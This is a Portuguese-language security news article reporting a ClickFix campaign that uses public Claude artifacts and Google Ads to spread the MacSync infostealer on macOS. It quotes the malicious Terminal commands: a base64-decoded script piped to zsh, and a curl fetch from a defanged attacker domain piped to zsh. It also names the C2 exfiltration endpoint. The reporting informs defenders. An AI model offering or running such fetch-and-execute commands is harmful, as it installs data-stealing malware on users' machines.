Ataque ClickFix usa vulnerabilidades do Claude LLM para disseminar infostealers no Mac
19 de Fevereiro de 2026

Atores maliciosos têm explorado artefatos do Claude e anúncios do Google Ads em campanhas ClickFix para infectar usuários de macOS com malware do tipo infostealer.

Pelo menos duas variantes dessa atividade foram identificadas em circulação, e mais de 10.000 usuários acessaram conteúdos com instruções perigosas.

Artefatos do Claude são conteúdos gerados pelo modelo de linguagem da Anthropic (LLM), disponibilizados publicamente pelo próprio autor.

Podem ser instruções, guias, trechos de código ou outros tipos de saída isolados do chat principal, acessíveis por links hospedados no domínio claude.ai.

Na página do artefato, há um aviso informando que o conteúdo foi gerado pelo usuário e não foi verificado quanto à precisão.

Pesquisadores da divisão investigativa MoonLock Lab, da MacPaw, e da empresa de bloqueio de anúncios AdGuard identificaram resultados maliciosos em buscas por termos como “online DNS resolver”, “macOS CLI disk space analyzer” e “HomeBrew”.

Esses resultados maliciosos exibidos no Google Search direcionam o usuário a um artefato público do Claude ou a um artigo no Medium que simula suporte da Apple.

Em ambos os casos, a vítima é orientada a executar um comando shell no Terminal.

Na primeira variante do ataque, o comando é:
`echo "..." | base64 -D | zsh`

Na segunda variante, o comando é:
`true && curl -SsLfk --compressed "https://raxelpak[.]com/curl/[hash]" | zsh`

Pesquisadores da MoonLock revelaram que o guia malicioso do Claude recebeu pelo menos 15.600 visualizações, indicando a quantidade de usuários potencialmente enganados.

O AdGuard havia registrado 12.300 visualizações poucos dias antes.

A execução desses comandos no Terminal baixa um loader de malware para o infostealer MacSync, que coleta e exfiltra informações sensíveis do sistema.

Segundo os especialistas, o malware se conecta à infraestrutura de comando e controle (C2) usando um token e API key embutidos, além de mascarar o user-agent como o de um navegador macOS para evitar detecção.

“A resposta é encaminhada diretamente ao osascript — um AppleScript que realiza o roubo de dados, como chaves, dados do navegador e carteiras de criptomoedas”, explicam os pesquisadores.

Os dados roubados são compactados em um arquivo localizado em ‘/tmp/osalogging.zip’ e enviados ao servidor C2 no endereço a2abotnet[.]com/gate por meio de uma requisição HTTP POST.

Se a exfiltração falhar, o arquivo é dividido em partes menores e a tentativa é repetida até oito vezes.

Após o envio bem-sucedido, o malware remove todos os vestígios locais.

A MoonLock Lab constatou que ambas as variantes baixam a segunda etapa do malware do mesmo endereço C2, sugerindo a atuação de um único grupo por trás dessa campanha.

Campanhas similares já utilizaram o compartilhamento de chats no ChatGPT e Grok para distribuir o infostealer AMOS.

Em dezembro de 2023, pesquisadores detectaram que conversas nesses sistemas foram exploradas em ataques ClickFix direcionados a usuários de Mac.

A variação com Claude mostra que o abuso também se estendeu a outros grandes modelos de linguagem (LLMs).

Especialistas recomendam cautela e alertam para não executar comandos no Terminal sem total compreensão.

Pesquisadores da Kaspersky destacam que, em caso de dúvida, perguntar diretamente ao chatbot na mesma conversa sobre a segurança do comando pode ajudar a identificar riscos.

Publicidade

Anuncie no CaveiraTech e coloque sua marca na frente de milhares de profissionais de cybersecurity

Nossa audiência é formada por analistas, pentesters, decisores e entusiastas que consomem nossas notícias todo dia pelo Site, Newsletter e Instagram. Fale com quem realmente importa para o seu negócio. Anuncie aqui. Saiba mais...